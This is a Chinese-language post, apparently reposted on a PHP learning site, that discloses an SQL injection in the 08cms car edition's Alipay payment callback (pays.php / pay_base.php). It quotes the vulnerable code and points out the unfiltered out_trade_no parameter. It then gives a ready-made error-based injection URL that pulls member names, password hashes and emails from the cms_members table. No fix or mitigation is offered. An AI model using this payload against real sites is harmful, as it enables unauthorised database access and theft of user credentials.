网站地图    收藏   

主页 > 后端 > 网站安全 >

08cms Injection - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 汽车的:/include/paygate/alipay/pays.php/* *类名:alipay_notify *功能:付款过程中服务器通知类 *详细:该页面是通知返回核心处理文件,不需要修改 *版本:3.1 *修改日期:2010-10-29 #39;说明: #3...

汽车的:

/include/paygate/alipay/pays.php


/*
 *类名:alipay_notify
 *功能:付款过程中服务器通知类
 *详细:该页面是通知返回核心处理文件,不需要修改
 *版本:3.1
 *修改日期:2010-10-29
 '说明:
 '以下代码只是为了方便商户测试而提供的样例代码,商户可以根据自己网站的需要,按照技术文档编写,并非一定要使用该代码。
 '该代码仅供学习和研究支付宝接口使用,只是提供一个参考。
*/

require_once("class/alipay_notify.php");
empty($_POST) && $_POST = &$_GET;
require_once('../pay_base.php');
$pay = new pay_base('alipay');  // 实例化
$pay->by = 'pays';
$pay->order_sn = $_POST['out_trade_no']; //看看这里 没过滤就带进去了 我们看看 pay_base 干嘛的 pay_base.php
........

        case 'pays':
            $sql1 = "SELECT pid as order_id,mid,amount as totalfee FROM {$tblprefix}pays WHERE ordersn='$this->order_sn'";// 看这里直接过来了

            $this->status = 0;
            break;
        default :
            $sql1 = '';
        }
        if($sql1 && $tmp = $db->fetch_one($sql1)){  //注入

 

Exp:


/include/paygate/alipay/pays.php?out_trade_no=22'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)*2))X%20FROM%20information_schema.tables%20GROUP%20BY%20X)a)%20AND'

212454mmaumut0tdma6j6e



自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论